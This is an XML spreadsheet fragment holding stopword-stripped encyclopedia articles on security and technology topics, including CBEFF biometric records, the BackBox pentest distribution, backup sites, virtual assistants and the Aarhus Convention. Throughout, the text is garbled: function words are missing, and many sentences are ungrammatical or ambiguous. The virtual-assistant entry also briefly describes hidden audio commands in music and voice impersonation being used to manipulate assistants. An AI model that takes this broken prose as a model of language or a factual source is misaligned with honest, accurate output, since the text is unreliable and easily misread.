    <t>cbeff (common biometric exchange formats framework) iso/iec standards defining approach facilitate serialisation sharing biometric data implementation agnostic manner. this achieved data structure describes, contains, biometric data. overview cbeff defines abstract data elements used construct biometric information record (birs). consists least standard biometric header (sbh), least biometric data block (bdb), optional security block (sb).the biometric data block (bdb) format requirements defined cbeff. instead, root header (sbh) identifies remaining data elements, type information related child sibling birs. included, optional security block (sb) specifies encryption integrity information entire structure. cbeff defines following types cbeff structures: simple cbeff structure complex cbeff structure self-identifying simple cbeff structure multiple cbeff structurethese cbeff structures allow different contents configurations, including single birs, child birs, multiple linked birs meet demands given domain use. cbeff patron format defined using cbeff structures. cbeff patron format definition specify required optional cbeff data elements, patron-specific data elements, abstract values. specific cbeff patron format used entities exchange biometric data. cbeff structures data elements seen building blocks cbeff patron formats used biometric data exchange. history cbeff developed series workshops 1999 2000 cbeff development team composed national institute standards technology (nist) bioapi consortium. from 2001 2006 cbeff maintained nistir 6529 standard, february 2005 adopted ansi incits 398-2005 standard. 2006, adopted international standard iso/iec 19785 iso/iec. cbeff presently maintained within iso/iec 1/sc iso/iec 19785 multipart standard consisting part data element specification part procedures operation biometric registration authority part patron format specifications part security block format specification purpose intent cbeff define approach generically store exchange biometric data structure accompanying meta-data defines data carries. this means client application need concerned specifics every possible biometric type (eg: face, finger, iris, etc) encoding format (eg: xml, encoded, simple byte encoded, etc), rather needs know things access data interested parse header (sbh) cbeff compliant data structure, and; know identifier specific biometric type capable parsing (where identifier obtained sbh)the motivation self-describing data format reduces burden client applications dealing multitude biometric types encodings. this strategy permits application effectively ignore biometric data unknown using cbeff application needs know read cbeff structure gain knowledge whether biometric data contains interest. cbeff patron formats combine abstract cbeff data elements application domain specific structures particular cases. patron simply organisation authorised define cbeff patron format. patron formats necessary client application know format expect sbh. cases, particular patron format self-identifying structure, includes meta-data informing client type patron format expect. cbeff system variety biometric types and/or encoding formats present. case sub-systems within system specialise particular biometric characteristic cbeff permits sub-system selectively consume ignore data based information cbeff header without concern specific biometric. example system capable enrolling either face finger biometric samples, captured biometric data input common location. captured data contained cbeff structures sub-system (finger face) could poll incoming location inspect select data relating biometric modality system interested important point ‘inspect select’ process completed without regard actual biometric data contained cbeff structure decision whether consume biometric data based solely meta-data standard biometric header biometric identifiers biometric registry cbeff makes well-defined identifiers inform applications data contained cbeff structure. ensure identifiers universally accepted used consistently, cbeff standard requires registry (the biometric registration authority) maintained record identifiers used cbeff. currently authority international biometrics identity association (ibia). ibia maintain lists identifiers specifying various information conveyed cbeff structure. examples identifier lists maintained registry include: biometric organisations header identifiers format identifiersany organisation working field biometrics apply registration registry biometric organisation, registration cbeff patron requires organization producer open standards. once accepted organisation register identifiers define biometric elements containment cbeff structure. registration procedure defined ibia registration example biometric identifiers notable case cbeff epassports. chip epassport optionally contain variety biometric types (eg: face, finger, iris) permitted icao 9303 standard, however icao compliant epassports required contain face biometric reference relating holder passport. this typically image passport holder small amount meta-data describing image. face biometric reference passport contained within bir, standard biometric header cbeff contain following values denote: organisation defined data type biometric encoding biometricdata encoded epassport chip binary format; extract shows part standard biometric header cbeff structure. worth noting example data formatted tag-length-value (tlv) structure self-identifying cbeff patron format. such, client reading data epassport needs aware patron format used epassports format specified fields (biometric information record). specifically interest sections highlighted, described table below: case epassport values inform application following information related cbeff structure: version patron format (cbeff patron header version 0101) data type contains face data (bdb biometric type iso/iec defined data format expected (ie: biometric organisation 0101). biometric contained within 19794-5 biometric face image (bdb header 0008)note: values universally defined biometrics registry maintained ibia. references workshop 2009 cbeff original cbeff document nistid 6529 ibia cbeff registry iso/iec 19785 external links cbeff nistir 6529 biometrics-cbeff ibia cbeff biometric organizations</t>
  </si>
  <si>
    <t>BackBox</t>
  </si>
  <si>
    <t>backbox penetration test security assessment oriented ubuntu-based linux distribution providing network informatic systems analysis toolkit. includes complete tools required ethical hacking security testing. contents main backbox providing alternative, highly customizable well performing system. backbox uses light window manager xfce. delivers fast, effective, customizable complete experience. also helpful community behind includes used security analysis linux tools, aiming wide spread goals, ranging application analysis network analysis, stress tests sniffing, also including vulnerability assessment, computer forensic analysis exploitation. part power distribution comes launchpad repository core, constantly updated latest stable version known used ethical hacking tools. integration development tools distribution follows open source community, particularly debian free software guidelines criteria. releases categories backbox linux categories listed follow: information gathering vulnerability assessment exploitation privilege escalation maintaining access documentation reporting reverse engineering social engineering forensic analysis voip analysis wireless analysis miscellaneous tools more tools included backbox: metasploit armitage nmap openvas w3af social engineering toolkit ettercap scapy wireshark kismet aircrack ophcrack sqlmap john ripper references external links official website backbox linux opensourcefeed gallery</t>
  </si>
  <si>
    <t>AVIEN</t>
  </si>
  <si>
    <t>avien nominally acronym anti-virus information exchange network, although expansion rarely used. history group arose discussions following presentation robert vibert virus bulletin conference 2000 antivirus specialists companies including nortel, boeing prudential decided implement forum could freely share information concerning companies, products, upcoming malware, including email-based early warning system.initially, members avien individuals responsible security organizations minimum 1,500 care, excluded antivirus vendors 2002 companion organization aviews (anti-virus information early warning system) formed included members avien also encouraged participation security vendors interested parties. 2007, syngress published avien malware defense guide enterprise contributions members avien aviews.the organizations merged 2008 leadership andrew (ceo) david harley (coo). 2011, following taking role eset, announced leaving running avien david harley, signing "(former) avien ceo".by 2012 organization declined low-traffic mailing list, rarely updated site, occasional additions blog, including resource pages security topics tech support scams ransomware. since david harley's near-complete withdrawal security industry 2019 little heard avien community, expected heard. references external links avien site</t>
  </si>
  <si>
    <t>Backup site</t>
  </si>
  <si>
    <t>backup site work area recovery site location organization relocate following disaster, fire, flood, terrorist threat disruptive event. this integral part disaster recovery plan wider business continuity planning organization.a backup, alternate, site another data center location operated organization, contracted company specializes disaster recovery services. cases, organization agreement second organization operate joint backup site. addition, organization reciprocal agreement another organization site data centers. sites generally classified based prepared speed brought operation: "cold" (facility prepared), "warm" (equipment place), "hot" (operational data loaded) increasing cost implement maintain increasing "temperature". classification cold site cold site empty operational spaces basic facilities like raised floors, conditioning, power communication lines etc. following incident equipment brought resume operations. include backed copies data information original location organization, include hardware already lack provisioned hardware contributes minimal start-up costs cold site, requires additional time following disaster operation running capacity close prior disaster. cases, cold site equipment available, operational. warm site warm site compromise cold. these sites hardware connectivity already established, though smaller scale. warm sites might backups hand, complete several days week old. recovery delayed backup tapes delivered warm site, network connectivity established data recovered remote backup site. site site near duplicate original site organization, full computer systems well complete backups user data. real time synchronization sites used completely mirror data environment original site using wide area network links specialized software. following disruption original site, site exists organization relocate, minimal losses normal operations shortest recovery time. ideally, site running within matter hours. personnel moved site, possible site operational data processing perspective staff relocated. capacity site match capacity original site depending organization's requirements. this type backup site expensive operate. sites popular organizations operate real time processes financial institutions, government agencies ecommerce providers. important feature offered site production environment(s) running concurrently main datacenter. this syncing allows minimal impact downtime business operations. event significant outage event, site take place impacted site immediately. however, level redundancy come cheap, businesses weigh cost-benefit-analysis (cba) site utilization. nowadays backup site misses "proactive" approach considered site depending level maturity organization regarding 22301 approach (international standard business continuity management). alternate sites generally, alternate site refers site people equipment need work relocated period time normal production environment, whether reconstituted replaced, available. choosing choosing type backup site used decided organizations based cost benefit analysis. sites traditionally expensive cold sites, since much equipment company needs must purchased thus people needed maintain making operational costs higher. however, organization loses substantial amount revenue inactive, worth cost. another advantage site used operations prior disaster happening. this load balanced production processing method cost effective, provide users security minimal downtime event affects data centers. advantages cold site simple cost. requires fewer resources operate cold site equipment brought prior disaster. some organizations store older versions hardware center. this appropriate server farm environment, hardware could used many cases. downside cold site potential cost must incurred order make cold site effective. costs purchasing equipment short notice higher disaster make equipment difficult obtain. commercial sites when contracting services commercial provider backup site capability, organizations take note contractual usage provision invocation procedures. providers sign organization given site facility, often depending various service levels. this reasonable proposition unlikely organizations using service likely need time allows provider offer service affordable cost. however, large scale incident affects wide area, likely facilities become over-subscribed. organization request priority service provider, often higher monthly fee. commercial site also used secondary production site full scale mirroring environment primary data center. again, higher required, security site ability organization provide users uninterrupted access data applications could justify cost. also off-site data protection backup references general references records management services (2004, july 15). vital records: protect store vital records? haag, cummings, mccubbrey, pinsonneult, donovan. (2004). information management systems, information age. mcgraw-hill ryerson. service continuity (2007, itil v3). service continuity. retrieved from: http://itlibrary.org/index.php?page=it_service_continuity_management 03sep14 three stages disaster recovery sites bryce carrollnovember 20th, 2013</t>
  </si>
  <si>
    <t>Byzantine Foothold</t>
  </si>
  <si>
    <t>byzantine foothold unclassified code name related united states department defense effort within larger cyber initiative framework, specifically aimed curbing preventing foreign intrusions computer networks federal agencies. said threat related ongoing efforts chinese hackers peoples liberation army, public documentation available would prove case.the twenty largest american military-industrial contractors also invited participate program, highly potent hacker attack detected booz allen hamilton corporation.although government sees largest cyber espionage effort them, arrests made specific cyber intruder identified. public information available state on-going investigation related intrusion. also moonlight maze titan rain stakkato stuxnet references</t>
  </si>
  <si>
    <t>AVTECH Corporation</t>
  </si>
  <si>
    <t>avtech (chinese: 陞泰科技股份有限公司) taiwanese company produces video surveillance technology. history avtech founded 1996 romona graduate coon houng, established cctv manufacturer initial investment us$155,000.from 1999 2008 company earned nt$. 2005 became publicly traded company headquarters nankang software park taipei, taiwan. 2011, guidance evan voung, avtech shifted conventional cctv market consumer market. products mobile surveillance systems primary products avtech. products targeted camera market since 2011 commonly used intelligence surveillance systems. product series includes eagleeyes application mobile phones tablets, well hardware products push video function cameras.avtech's self-developed mobile application software known eagleeyes popular surveillance app. facilitated fully functional remote control system accessible smartphones tablets. 2010, push video, active notification system introduced eagleeyes applied avtech's full range products. once alarm triggered, video clip includes five-second pre-event recording sent mobile devices within five seconds, feature allows surveillance serve active protector rather merely acting passive evidence provider. standalone digital network video recorder (nvr) integrates video surveillance, remote control storage. supports plug play technology. configuration available give users record play video. serves network attached storage (nas) remote offsite backup important images. supports 1080p displays. also configured data source (central management system). awards 2007, placed taiwan bnext magazine. 2008, awarded best under billion asia forbes magazine. 2009, ranked 16th security security magazine. references external links official website avtech thailand avtech indonesia</t>
  </si>
  <si>
    <t>Virtual assistant</t>
  </si>
  <si>
    <t>intelligent virtual assistant (iva) intelligent personal assistant (ipa) software agent perform tasks services individual based commands questions. term "chatbot" sometimes used refer virtual assistants generally specifically accessed online chat. cases, online chat programs exclusively entertainment purposes. some virtual assistants able interpret human speech respond synthesized voices. users assistants questions, control home automation devices media playback voice, manage basic tasks email, to-do lists, calendars verbal commands. similar concept, however differences, lays dialogue systems.as 2017, capabilities usage virtual assistants expanding rapidly, products entering market strong emphasis email voice user interfaces. apple google large installed bases users smartphones. microsoft large installed base windows-based personal computers, smartphones smart speakers. amazon large install base smart speakers. conversica million engagements email interface intelligent virtual assistants business. virtual assistant refer machine person whose primary help employer specific online virtually. most time person residing another part world. history experimental decades: 1910s–1980s radio first voice activated released 1922. wooden shape would come house name called. 1952, bell labs presented "audrey", automatic digit recognition machine. occupied six- foot-high relay rack, consumed substantial power, streams cables exhibited myriad maintenance problems associated complex vacuum-tube circuitry. could recognize fundamental units speech, phonemes. limited accurate recognition digits spoken designated talkers. could therefore used voice dialing, cases push-button dialing cheaper faster, rather speaking consecutive digits.another early tool enabled perform digital speech recognition shoebox voice-activated calculator, presented general public 1962 seattle world's fair initial market launch 1961. this early computer, developed almost years introduction first personal computer 1981, able recognize spoken words digits first natural language processing computer program chatbot eliza developed professor joseph weizenbaum 1960s. created "demonstrate communication machine superficial". eliza used pattern matching substitution methodology scripted responses simulate conversation, gave illusion understanding part program. weizenbaum's secretary reportedly asked weizenbaum leave room eliza could real conversation. weizenbaum surprised this, later writing: realized extremely short exposures relatively simple computer program could induce powerful delusional thinking quite normal people.this gave name eliza effect, tendency unconsciously assume computer behaviors analogous human behaviors; anthropomorphisation, phenomenon present human interactions virtual assistants. next milestone development voice recognition technology achieved 1970s carnegie mellon university pittsburgh, pennsylvania substantial support united states department defense darpa agency, funded five years speech understanding research program, aiming reach minimum vocabulary 1,000 words. companies academia including ibm, carnegie mellon university (cmu) stanford research institute took part program. result "harpy", mastered 1000 words, vocabulary three-year-old could understand sentences. could process speech followed pre-programmed vocabulary, pronunciation, grammar structures determine sequences words made sense together, thus reducing speech recognition errors. 1986 tangora upgrade shoebox, voice recognizing typewriter. named world's fastest typist time, vocabulary 20,000 words used prediction decide likely result based said past. ibm's approach based hidden markov model, adds statistics digital signal processing techniques. method makes possible predict likely phonemes follow given phoneme. still speaker individually train typewriter recognize voice, pause word. birth smart virtual assistants: 1990s–present 1990s, digital speech recognition technology became feature personal computer ibm, philips lernout hauspie fighting customers. much later market launch first smartphone simon 1994 laid foundation smart virtual assistants know today. 1997, dragon's naturally speaking software could recognize transcribe natural human speech without pauses word document rate words minute. version naturally speaking still available download still used today, instance, many doctors document medical records. 2001 colloquis publicly launched smarterchild, platforms like messenger. while entirely text-based smarterchild able play games, check weather, look facts, converse users extent.the first modern digital virtual assistant installed smartphone siri, introduced feature iphone october 2011. apple inc. developed siri following 2010 acquisition siri inc., spin-off international, research institute financed darpa united states department defense. tasks sending text message, making phone calls, checking weather setting alarm. over time, developed provide restaurant recommendations, search internet, provide driving directions. november 2014, amazon announced alexa alongside echo. april 2017 amazon released service building conversational interfaces type virtual assistant interface. method interaction virtual assistants work via: text, including: online chat (especially instant messaging application application text, e-mail text-based communication channel, example conversica's intelligent virtual assistants business. voice, example amazon alexa amazon echo device, siri iphone, google assistant google-enabled/android mobile devices taking and/or uploading images, case samsung bixby samsung galaxy s8some virtual assistants accessible multiple methods, google assistant chat google allo google messages voice google home smart speakers. virtual assistants natural language processing (nlp) match user text voice input executable commands. many continually learn using artificial intelligence techniques including machine learning. some assistants like google assistant(which contains google lens) samsung bixby also added ability image processing recognize objects image help users better results clicked images. activate virtual assistant using voice, wake word might used. this word groups words "hey siri", google" "hey google", "alexa", "hey microsoft". virtual assistants become popular, increasing legal risks involved.: devices objects found virtual assistants integrated many types platforms like amazon alexa, across several them: into devices like smart speakers amazon echo, google home apple homepod instant messaging applications smartphones web, e.g. facebook's (virtual assistant) facebook facebook messenger apps built mobile operating system (os), apple's siri devices blackberry assistant blackberry devices, desktop cortana microsoft windows built smartphone independent bixby samsung galaxy note within instant messaging platforms, assistants specific organizations, aeromexico's aerobot facebook messenger wechat secretary wechat within mobile apps specific companies organizations, domino's pizza appliances, cars, wearable technology. previous generations virtual assistants often worked websites, alaska airlines' jenn, interactive voice response (ivr) systems american airlines' nuance. services virtual assistants provide wide variety services. these include: provide information weather, facts e.g. wikipedia imdb, alarm, make to-do lists shopping lists play music streaming services spotify pandora; play radio stations; read audiobooks play videos, shows movies televisions, streaming e.g. netflix conversational commerce (see below) assist public interactions government (see artificial intelligence government) complement and/or replace customer service humans. report estimated automated online assistant produced decrease work-load human-provided call centre. conversational commerce conversational commerce e-commerce various means messaging, including voice assistants also live chat e-commerce sites, live chat messaging applications wechat, facebook messenger whatsapp chatbots messaging applications sites. customer support virtual assistant work customer support team business provide 24x7 support customers. provides quick responses, enhances customer's experience. third-party services amazon enables alexa "skills" google "actions", essentially applications assistant platforms. virtual assistant privacy virtual assistants variety privacy concerns associated them. features activation voice pose threat, features requires device always listening. modes privacy virtual security button proposed create multilayer authentication virtual assistants. privacy policy prominent virtual assistants google assistant privacy policy google assistant store audio data without user's permission, store conversation transcripts personalise experience. personalisation turned settings. user wants google assistant store audio data, voice audio activity (vaa) turn feature. audio files sent cloud used google improve performance google assistant, feature turned amazon's alexa privacy policy amazon's virtual assistant, alexa, states listens conversations wake word (like alexa, amazon, echo) used. starts recording conversation call wake word, stops recording seconds silence. sends recorded conversation cloud. possible delete recording cloud visiting ‘alexa privacy’ ‘alexa’. apple's siri apple states record audio improve siri. instead, uses transcripts. transcript data sent deemed important analysis. users anytime want siri send transcripts cloud. presumed observed interest consumer presumed added value allowing interactions added value virtual assistants come among others following: voice communication sometimes represent optimal man-machine communication:it convenient: sectors voice possible communication, generally, allows free-up hands vision potentially another activity parallel, helps also disabled people. faster: voice efficient writing keyboard: speak words minute opposed case writing keyboard. also natural thus requiring less effort (reading text however reach words minute).virtual assistants save time automation: take appointments, read news consumer something else. also possible virtual assistant schedule meetings, hence helping organize time. designers digital schedulers explained ambition calendars schedule lives make consumer time efficiently, machine learning processes, complete organization work time free time. example consumer expresses desire scheduling break, schedule optimal moment purpose (for example time week less productive), additional long-term objective able schedule organize free time consumer, assure optimal work efficiency. perceived interest according recent study (2019), reasons using virtual assistants consumers perceived usefulness perceived enjoyment. first result study perceived usefulness perceived enjoyment equivalent strong influence consumer willingness virtual assistant. second result study that:provided content quality strong influence perceived usefulness strong influence perceived enjoyment. visual attractiveness strong influence perceived enjoyment. automation strong influence perceived usefulness. controversies artificial intelligence controversies virtual assistants spur filter bubble: social media, virtual assistants’ algorithms trained show pertinent data discard others based previous activities consumer: pertinent data interest please consumer. result, become isolated data disagrees viewpoints, effectively isolating intellectual bubble, reinforcing opinions. this phenomenon known reinforce fake news echo chambers. virtual assistants also sometimes criticized overrated. particular, casilli points virtual assistants neither intelligent artificial reasons:not intelligent assistant human, tasks human could easily, limited specter actions: find, class, present information, offers documents. also, virtual assistants neither able make decisions anticipate things. artificial would impossible without human labelization micro working. ethics implications 2019 antonio casilli, french sociologist, criticized artificial intelligence virtual assistants particular following way: first level fact consumer provides free data training improvement virtual assistant, often without knowing ethically disturbing. second level, might even ethically disturbing know trained data. this artificial intelligence trained neural networks, require huge amount labelled data. however, data needs labelled human process, explains rise microwork last decade. that remotely using people worldwide repetitive simple tasks cents, listening virtual assistant speech data, writing said. microwork criticized insecurity causes, total lack regulation: average salary 1,38 dollar/hour 2010, provides neither healthcare retirement benefits, sick pay, minimum wage. hence, virtual assistants designers controversial spurring insecurity, propose still human would impossible without microwork millions human workers.privacy concerns raised fact voice commands available providers virtual assistants unencrypted form, thus shared third parties processed unauthorized unexpected manner. additionally linguistic content recorded speech, user's manner expression voice characteristics implicitly contain information biometric identity, personality traits, body shape, physical mental health condition, sex, gender, moods emotions, socioeconomic status geographical origin. developer platforms notable developer platforms virtual assistants include: amazon opened developers april 2017. involves natural language understanding technology combined automatic speech recognition introduced november 2016. google provides actions google dialogflow platforms developers create "actions" google assistant apple provides sirikit developers create extensions siri ibm's watson, sometimes spoken virtual assistant fact entire artificial intelligence platform community powering virtual assistants, chatbots. many types solutions. previous generations previous generations text chat-based virtual assistants, assistant often represented avatar (a.k.a. interactive online character automated character) known embodied agent. economic relevance individuals digital experiences enabled virtual assistants considered among major recent technological advances promising consumer trends. experts claim digital experiences achieve status-weight comparable ‘real’ experiences, become sought-after prized. trend verified high number frequent users substantial growth worldwide user numbers virtual digital assistants. mid-2017, number frequent users digital virtual assistants estimated around worldwide. addition, observed virtual digital assistant technology longer restricted smartphone applications, present across many industry sectors (incl. automotive, telecommunications, retail, healthcare education). response significant expenses firms across sectors increasing implementation mobile devices, market speech recognition technology predicted grow cagr 34.9% globally period 2016 2024 thereby surpass global market size us$7.5 billion 2024. according ovum study, "native digital assistant installed base" projected exceed world's population 2021, billion active voice ai–capable devices. according ovum, time "google assistant dominate voice ai–capable device market 23.3% market share, followed samsung's bixby (14.5%), apple's siri (13.1%), amazon's alexa (3.9%), microsoft's cortana (2.3%)."taking consideration regional distribution market leaders, north american companies (e.g. nuance communications, ibm, egain) expected dominate industry next years, significant impact byod (bring your device) enterprise mobility business models. furthermore, increasing demand smartphone-assisted platforms expected boost north american intelligent virtual assistant (iva) industry growth. despite smaller size comparison north american market, intelligent virtual assistant industry asia-pacific region, main players located india china predicted grow annual growth rate (above global average) 2016–2024 period. economic opportunity enterprises virtual assistants seen gadget individuals, could real economic utility enterprises. example, virtual assistant take role always available assistant encyclopedic knowledge. organize meetings, check inventories, verify informations. virtual assistants important integration small middle-sized enterprises often consists easy first step global adaptation internet things (iot). indeed, technologies first perceived small medium-sized enterprises technologies critical importance, complicated, risky costly used. security 2018, researchers university california, berkeley, published paper showed audio commands undetectable human could directly embedded music spoken text, thereby manipulating virtual assistants performing certain actions without user taking note researchers made small changes audio files, cancelled sound patterns speech recognition systems meant detect. these replaced sounds would interpreted differently system command dial phone numbers, open websites even transfer money. possibility known since 2016, affects devices apple, amazon google.in addition unintentional actions voice recording, another security privacy risk associated intelligent virtual assistants malicious voice commands: attacker impersonates user issues malicious voice commands example, unlock smart door gain unauthorized entry home garage order items online without user's knowledge. although ivas provide voice-training feature prevent impersonation, difficult system distinguish similar voices. thus, malicious person able access iva-enabled device might able fool system thinking real owner carry criminal mischievous acts. also references</t>
  </si>
  <si>
    <t>Aanval</t>
  </si>
  <si>
    <t>aanval commercial siem product designed specifically snort, suricata, syslog data. aanval active development since 2003 remains longest running snort capable siem products industry. aanval dutch "attack". history aanval created loyal moses 2003 publicly made available march 2004 released private commercial license c1-ra1008. throughout lifecycle software also referred openaanval comaanval addition aanval. aanval's provided ajax style security event monitoring reporting web-browser. since aanval's creation, developed intrusion detection, correlation threat management console specific focus normalizing snort, suricata, syslog data.several information security related books published include details references aanval, including "linux server security, second edition" o'reilly media, "security management" o'reilly media, "snort: toolkit" o'reilly media 2010 "unix linux system administration handbook, fourth edition" o'reilly media. also snort intrusion detection system (ids) intrusion prevention system (ips) network intrusion detection system (nids) sguil references external links official website aanval wiki snort homepage oisf homepage</t>
  </si>
  <si>
    <t>Aarhus Convention</t>
  </si>
  <si>
    <t>unece convention access information, public participation decision-making access justice environmental matters, usually known aarhus convention, signed june 1998 danish city aarhus. entered force october 2001. march 2014, parties—46 states european union. ratifying states europe central asia. begun applying aarhus-type principles legislation, notably water framework directive (directive 2000/60/ec). liechtenstein monaco signed convention ratified aarhus convention grants public rights regarding access information, public participation access justice, governmental decision-making processes matters concerning local, national transboundary environment. focuses interactions public public authorities. content aarhus convention multilateral environmental agreement opportunities citizens access environmental information increased transparent reliable regulation procedure secured. enhancing environmental governance network, introducing reactive trustworthy relationship civil society governments adding novelty mechanism created empower value public participation decision-making process guarantee access justice: "governance-by-disclosure" leads shift toward environmentally responsible society. aarhus convention drafted governments, highly required participation ngos, legally binding states ratified becoming parties. among latter included therefore task ensure compliance within member states also institutions, bodies carry public administrative duties. each party commitment promote principles contained convention fill national report, always embracing consultative transparent process general features aarhus convention rights-based approach: public, present future generations, right know live healthy environment. distinction made "the public", civil society's actors, "public concerned" precisely, persons organisations affected interested environmental decision-making (e.g. environmental ngos). "public authorities" addressees convention, namely, governments, international institutions, privatized bodies public responsibilities control public bodies. private sector, information disclosure depends voluntary, non- mandatory practices, bodies acting judicial legislative capacity, excluded.other significant provisions "non-discrimination" principle (all information provided without taking account nationality citizenship applicant), international nature convention, importance attributed promotion environmental education public. three pillars access information: citizen right wide easy access environmental information. public authorities must provide information required collect disseminate timely transparent manner. they refuse particular situations (such national defence); unece, 2006 public participation decision making: public must informed relevant projects chance participate decision-making legislative process. decision makers take advantage people's knowledge expertise; contribution strong opportunity improve quality environmental decisions, outcomes guarantee procedural legitimacy access justice: public right judicial administrative recourse procedures case party violates fails adhere environmental convention's principles. further reflections aarhus convention "proceduralisation environmental regulation", focuses setting listing procedures rather establishing standards specifying outcomes, permitting parties involved interpret implement convention systems circumstances characterize nation. this model embodies perfect example multi-level governance. risk could loss time resources could otherwise invested defining outcomes, notwithstanding fact renders convention vague, weak open multiple interpretations. other critiques note fact private bodies excluded mandatory procedures (mason, 2010), that, moreover, also debated whether ngos involved faithfully representing environmental interests, ordinary citizens often financial means participate effectively therefore choice represented larger organisations. relative differences participants social groups' resource inequalities also suggests possibility irregular imbalanced environmental protection. compliance committee aarhus convention compliance committee established fulfill requirement article convention review compliance establish arrangements reviewing compliance convention.the convention unique compliance review mechanism, triggered four ways: party makes submission concerning compliance, party makes submission concerning another party's compliance, convention secretariat makes referral committee, member public makes communication concerning compliance party.the compliance mechanism unique international environmental law, allows members public communicate concerns party's compliance directly committee international legal experts empowered examine merits case (the aarhus convention compliance committee). nonetheless, compliance committee cannot issue binding decisions, rather makes recommendations full meeting parties (mop). however, practice, mops occur infrequently, parties attempt comply recommendations compliance committee. august 2009, communication public many originating non-governmental organizations submission party lodged convention's compliance committee. pollutant release protocol kyiv protocol pollutant release transfer registers aarhus convention adopted extraordinary meeting parties 2003, kyiv, ukraine. states european community signed protocol. 2016, states plus european union ratified protocol. kyiv protocol first legally binding international instrument pollutant release transfer registers (prtrs). prtrs inventories pollution industrial sites sources agriculture transport. objective protocol enhance public access information establishment coherent, nationwide pollutant release transfer registers (prtrs)." protocol places indirect obligations private enterprises report annually national governments releases transfers pollutants. parties protocol need parties convention. protocol sense free-standing, international agreement. kiev protocol prtrs enter force days sixteenth state ratifies accedes agreement. amendment aarhus convention "public participation decisions deliberate release environment placing market genetically modified organisms" adopted second meeting parties 2005, almaty, kazakhstan. august 2009, ratified countries. amendment enter force days least three-quarters parties aarhus convention ratify it.united nations secretary-general kofi annan (1997–2006) said, "although regional scope, significance aarhus convention global. impressive elaboration principle declaration, stresses need citizens' participation environmental issues access information environment held public authorities. ambitious venture area environmental democracy undertaken auspices united nations." influence aarhus convention also extends beyond environmental field. internet governance forum, held 12–15 2007, janeiro, convention presented model public participation transparency operation international forums. also freedom information legislation participatory monitoring action climate empowerment references external links unece aarhus convention website unece aarhus convention clearinghouse website case aarhus convention compliance committee (2004–2008) edition case aarhus convention compliance committee (2004–2011) second meeting parties aarhus convention. 2005 third meeting parties aarhus convention. 2008 archived april 2016 wayback machine fourth meeting parties aarhus convention. 2011 fifth meeting parties aarhus convention. 2014 aarhus convention: legal guide</t>
  </si>
  <si>
    <t>Operation Cyber Condition Zebra</t>
  </si>
  <si>
    <t>operation cyber condition zebra network operations campaign conducted united states navy deny network intrusion establish adequate computer network defense posture provide defense-in-depth warfighting capability. operation specifies perimeter security legacy networks deny intrusions data infiltration, firewalls maintained risk assessment formal adjudication legacy application waiver requests, legacy networks shut quickly possible enterprise networks (such nmci) established. name analogue term "material condition zebra," standard configuration equipment systems warship provide greatest degree subdivision tightness ship. immediately automatically general quarters sounded. references mc2(sw) christopher koons (fall 2006). "operation aims increase network security" (pdf). infodomain: information superiority warfighter: 8–10. archived original (pdf) july 2007. retrieved 2007-05-30. operation deliberate operational campaign secure navy’s legacy networks....</t>
  </si>
  <si>
    <t>Virtual data room</t>
  </si>
  <si>
    <t>virtual data room (sometimes called deal room) online repository information used storing distribution documents. many cases, virtual data room used facilitate diligence process transaction, loan syndication, private equity venture capital transactions. this diligence process traditionally used physical data room accomplish disclosure documents. reasons cost, efficiency security, virtual data rooms widely replaced traditional physical data room.a virtual data room extranet bidders advisers given access internet. extranet essentially website limited controlled access, using secure log-on supplied vendor, disabled time, vendor, bidder withdraws. much information released confidential restrictions applied viewer's ability release third parties means forwarding, copying printing). this effectively applied protect data using digital rights management.the virtual data room provides access secure documents authorized users dedicated site, secure agent applications. process mergers acquisitions data room part central repository data relating companies divisions acquired sold. data room enables interested parties view information relating business controlled environment confidentiality preserved. conventionally achieved establishing supervised, physical data room secure premises controlled access. cases, physical data room, bidder team access room time. virtual data room designed advantages conventional data room (controlling access, viewing, copying printing, etc.) fewer disadvantages. increased efficiency, many businesses industries moved using virtual data rooms instead physical data rooms. 2006, spokesperson company sets virtual deal rooms reported claiming process reduced bidding process thirty days compared physical data rooms.a virtual data room prerequisite automation tasks diligence process. references</t>
  </si>
  <si>
    <t>Abbassa Malik</t>
  </si>
  <si>
    <t>abbassa malik (arabic: عباسة ماليك) (born june 1989), also known malikpc, algerian grey hacker threatened death israeli mossad february 2012 hacking several israeli sites. also defaced dozens french sites. later specialized programming. also list computer criminals references external links official website zone-h</t>
  </si>
  <si>
    <t>ButterflyMX</t>
  </si>
  <si>
    <t>butterflymx american property technology company specializes smartphone-based access control. butterflymx’s hardware offerings include video intercom systems keypads users manage mobile application. history butterflymx founded 2014 york city cyrus claffey, matthew knoff, kunal shah, ivan mihalj address difficulties traditionally wired intercom usage, installation, administration. 2014, butterflymx received people’s choice award national multifamily housing council, 2018 butterflymx secured $5.5 million funding.in 2018, butterflymx began expand internationally, appearing access control markets europe south america. after period growth, butterflymx raised additional million investors september 2020. this group investors included stifel financial, egis capital, zillow co-founder spencer rascoff. leadership butterflymx managed aaron rudenstine executive chairman cyrus claffey. also list tech companies york metropolitan area references external links official website</t>
  </si>
  <si>
    <t>Race After Technology</t>
  </si>
  <si>
    <t>race after technology: abolitionist tools code 2019 american book focusing range ways social hierarchies, particularly racism, embedded logical layer internet-based technologies. 2020 oliver cromwell book prize, 2020 brooklyn public library literary award nonfiction, honorable mention 2020 communication, information technologies, media sociology book award, widely reviewed. overview ruha benjamin sociologist professor department african american studies princeton university. primary focus work relationship innovation equity, particularly focusing intersection race, justice technology. race after technology: abolitionist tools code published polity 2019. benjamin develops concept "new code," references michelle alexander's work crow, analyze seemingly "neutral" algorithms applications replicate worsen racial bias. review nation noted that, “what’s ultimately distinctive race after technology withering critiques present galvanizing. field benjamin maps treacherous phantasmic, full obstacles trip wires whose strength lies invisibility. time pries open black box, linking present horrific past, future feels open-ended, mutable…this perhaps benjamin’s greatest feat book: inventive wide-ranging analyses remind much purge tools view external flaws, always extensions exacting worldview also inclusive hopeful.” reception race after technology 2020 oliver cromwell book prize awarded american sociological association section race ethnic relations, 2020 brooklyn public library literary award nonfiction, honorable mention 2020 communication, information technologies, media sociology book award. also selected fast company books technology should read 2020.” references external links download discussion guide race after technology #newjimcode twitter</t>
  </si>
  <si>
    <t>Operation High Roller</t>
  </si>
  <si>
